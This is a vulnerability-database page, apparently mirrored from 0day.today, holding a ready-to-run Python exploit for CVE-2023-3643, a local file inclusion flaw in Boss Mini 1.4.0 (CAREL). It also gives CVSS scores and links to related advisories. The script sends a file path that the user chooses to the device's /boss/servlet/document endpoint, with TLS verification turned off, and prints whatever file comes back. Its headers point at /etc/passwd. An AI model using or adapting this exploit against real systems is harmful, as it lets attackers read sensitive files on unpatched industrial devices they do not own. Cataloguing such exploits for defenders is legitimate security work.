Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtNltt01337DAY-ID-39400
HistoryMar 04, 2024 - 12:00 a.m.

Boss Mini 1.4.0 - local file inclusion Exploit

2024-03-0400:00:00
nltt0
0day.today
107
boss mini 1.4.0
local file inclusion
exploit
requests
argparse
domain
file
cve-2023-3643
vulnerability
http request
security document

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.4 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

30.9%

JSON
# Exploit Title: Boss Mini 1.4.0 - local file inclusion
# Exploit Author: [nltt0] (https://github.com/nltt-br))
# CVE: CVE-2023-3643


'''
 _____       _                              _____ 
/  __ \     | |                            /  ___|
| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. 
| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
 \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ 
                            __/ |                 
                           |___/                  

'''

from requests import post 
from urllib.parse import quote
from argparse import ArgumentParser

try:
    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
    parser.add_argument('--domain', required=True, help='Application domain')
    parser.add_argument('--file', required=True, help='Local file')

    args = parser.parse_args()
    host = args.domain
    file = args.file
    url = '{}/boss/servlet/document'.format(host)
    file2 = quote(file, safe='')

    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
    }


    data = {
        'path': file2
    }

    try:
        req = post(url, headers=headers, data=data, verify=False)
        if req.status_code == 200:
            print(req.text)

    except Exception as e:
        print('Error in {}'.format(e))   
       

except Exception as e:
    print('Error in {}'.format(e))

Related

packetstorm 1
exploitdb 1
cve 1
prion 1
cvelist 1
nvd 1
ics 1
packetstorm
packetstorm
Boss Mini 1.4.0 Local File Inclusion
2024-03-04 00:00:00
exploitdb
exploitdb
Boss Mini 1.4.0 - local file inclusion
2024-03-03 00:00:00
cve
cve
CVE-2023-3643
2023-07-12 18:15:09
prion
prion
Design/Logic Flaw
2023-07-12 18:15:00
cvelist
cvelist
CVE-2023-3643 Boss Mini document file inclusion
2023-07-12 17:31:03
nvd
nvd
CVE-2023-3643
2023-07-12 18:15:09
ics
ics
CAREL Boss-Mini
2024-06-20 12:00:00

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.4 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

30.9%

JSON
Related for 1337DAY-ID-39400
packetstorm1exploitdb1cve1prion1cvelist1nvd1ics1